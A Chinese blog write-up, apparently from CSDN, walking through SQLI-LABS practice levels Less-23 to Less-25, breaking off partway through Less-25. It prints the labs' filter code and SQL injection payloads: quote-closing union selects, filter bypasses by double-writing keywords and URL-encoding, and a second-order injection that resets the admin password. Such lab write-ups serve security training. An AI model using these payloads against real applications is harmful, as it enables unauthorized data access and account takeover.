SQLI-LABS 靶场通过小记(23~38)

本文记录了在SQLI-LABS靶场中从Less-23到Less-38的SQL注入攻击及防御方法,包括单引号闭合、逻辑运算注入、查看源码、URL编码绕过、盲注、宽字节注入等技巧,以及针对不同过滤策略的应对策略。
摘要由CSDN通过智能技术生成

Less-23:
$id=$_GET['id'];
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);					//获取getid的传参,搜索是否存在注释#,如果存在就用空 来代替,然后重新赋值给GET接受的id
$id = preg_replace($reg1, $replace, $id);					//获取getid的传参,搜索是否存在注释--,如果存在就用空 来代替,然后重新赋值给GET接受的id

image-20210714091932550

1.加单引号让后面闭合
?id=1' and 1=2 union select 1,database(),3'

image-20210714092142025

2.使用逻辑运算注入
?id=1' and 1=2 union select 1,database(),3 or '1=1

image-20210714092316592

Less-24:

通过二次注入修改其他用户的密码

image-20210714092656140

密码:123456

image-20210714092739583

image-20210714092827358

重置密码

新密码为:caocao

image-20210714092933402

修改成功

image-20210714093016827

在本地查看用户名及密码,发现admin用户的密码已经被修改admin' -- qwe用户的密码却没有被修改

image-20210714093216554

Less-25:

通过提示我们不难发现andor都被过滤了

image-20210714093456672

1.查看源码
function blacklist($id)
{
   
        $id= preg_replace('/or/i',"", $id);                     //strip out OR (non case sensitive)//删除OR(不区分大小写)
        $id= preg_replace('/AND/i',"", $id);            //Strip out AND (non case sensitive)//删除AND(不区分大小写)

        return $id;
}

image-20210714093600531

2.双写搭配大小写匹配关键字绕过
?id=1' anANdD 1=2 union select 1,database(),2 -- qwe

image-20210714093832013

3.关键字等价绕过
可以使用&代替and,url编码是%26
?id=1' %26 1
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值